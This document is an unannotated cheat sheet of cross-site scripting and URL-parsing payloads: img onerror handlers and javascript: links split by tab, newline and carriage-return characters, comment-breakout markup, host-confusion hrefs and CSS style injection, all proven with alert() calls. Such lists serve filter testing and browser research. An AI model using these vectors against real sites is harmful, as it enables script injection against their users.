Cheat Sheet

anchor.href='/0x09/example.com';0x0D
if(anchor.host === 'example.com')alert(9)

anchor.href='///example.com';0x0D
if(anchor.host === 'example.com')alert(47)

anchor.href='/\/example.com';0x0D
if(anchor.host === 'example.com')alert(92)

anchor.href='/0x00/example.com';0x0D
if(anchor.host === 'example.com')alert(0)

<img src 0x09onerror=alert(9)>

<img src 
onerror=alert(10)>

<img src 0x0Conerror=alert(12)>

<img src 0x0Donerror=alert(13)>

<img src  onerror=alert(32)>

1337⟦09⟧in0x09alert(9)

1337
in
alert(10)

13370x0Bin0x0Balert(11)

13370x0Cin0x0Calert(12)

13370x0Din0x0Dalert(13)

<img0x09src0x09onerror=alert(9)>

<img
src
onerror=alert(10)>

<img0x0Csrc0x0Conerror=alert(12)>

<img0x0Dsrc0x0Donerror=alert(13)>

<img src onerror=alert(32)>

document⟦09⟧['location'];alert(9)

document
['location'];alert(10)

document0x0B['location'];alert(11)

document0x0C['location'];alert(12)

document0x0D['location'];alert(13)

<a href="https://0x09example.com/" id="test9"></a>

<a href="https://
example.com/" id="test10"></a>

<a href="https://0x0Dexample.com/" id="test13"></a>

<a href="https:///example.com/" id="test47"></a>

<a href="https://@example.com/" id="test64"></a>

if (new URL(String.fromCodePoint(0) + "javascript:alert()").protocol=="javascript:"){alert(0)}

if (new URL(String.fromCodePoint(1) + "javascript:alert()").protocol=="javascript:"){alert(1)}

if (new URL(String.fromCodePoint(2) + "javascript:alert()").protocol=="javascript:"){alert(2)}

if (new URL(String.fromCodePoint(3) + "javascript:alert()").protocol=="javascript:"){alert(3)}

if (new URL(String.fromCodePoint(4) + "javascript:alert()").protocol=="javascript:"){alert(4)}

const c = String.fromCodePoint(i)0x0D
const c_upper = c.toUpperCase()0x0D
if (c_upper.length > c.length && isASCII(c_upper)){0x0D
    alert(c)0x0D
}

<div style="/**/color:red;">test</div>

<div style="font-family:'blah';color:red"></div>

var $=alert(36)

var _=alert(95)

var ª=alert(170)

var µ=alert(181)

<a href="//test.com/" id="test47"></a>

<a href="/\test.com/" id="test92"></a>

<a href="/0x00test.com/" id="test0"></a>

window⟦09⟧.alert();alert(9)

window
.alert();alert(10)

window0x0B.alert();alert(11)

window0x0C.alert();alert(12)

window0x0D.alert();alert(13)

const c = String.fromCodePoint(i);0x0D
0x0D
if (c.length !== c.toUpperCase().length) alert(i)

if (new URL("https://example.co" + String.fromCodePoint(9) + "m").hostname === 'example.com'){alert(9)}

if (new URL("https://example.co" + String.fromCodePoint(10) + "m").hostname === 'example.com'){alert(10)}

if (new URL("https://example.co" + String.fromCodePoint(13) + "m").hostname === 'example.com'){alert(13)}

if (new URL("https://example.co" + String.fromCodePoint(173) + "m").hostname === 'example.com'){alert(173)}

if (new URL("https://example.co" + String.fromCodePoint(847) + "m").hostname === 'example.com'){alert(847)}

<div class="0x09x0x09"></div>

<div class="
x
"></div>

<div class="0x0Cx0x0C"></div>

<div class="0x0Dx0x0D"></div>

<div class=" x "></div>

<!--- ><xmp>--><img src/onerror=alert(45)>-->

<div style="font-family:'x
;color:red;';">test</div>

<div style="font-family:'x0x0C;color:red;';">test</div>

<div style="font-family:'x0x0D;color:red;';">test</div>

<div style="font-family:'x';color:red;';">test</div>

const c = String.fromCodePoint(i)0x0D
const c_lower = c.toLowerCase()0x0D
if (c_lower.length != c.length){0x0D
    alert(i)0x0D
}

<a id="0" href="j0x09avas0x09crip0x09t:window">craft-me</a>

<a id="0" href="j
avas
crip
t:window">craft-me</a>

<a id="0" href="j0x0Davas0x0Dcrip0x0Dt:window">craft-me</a>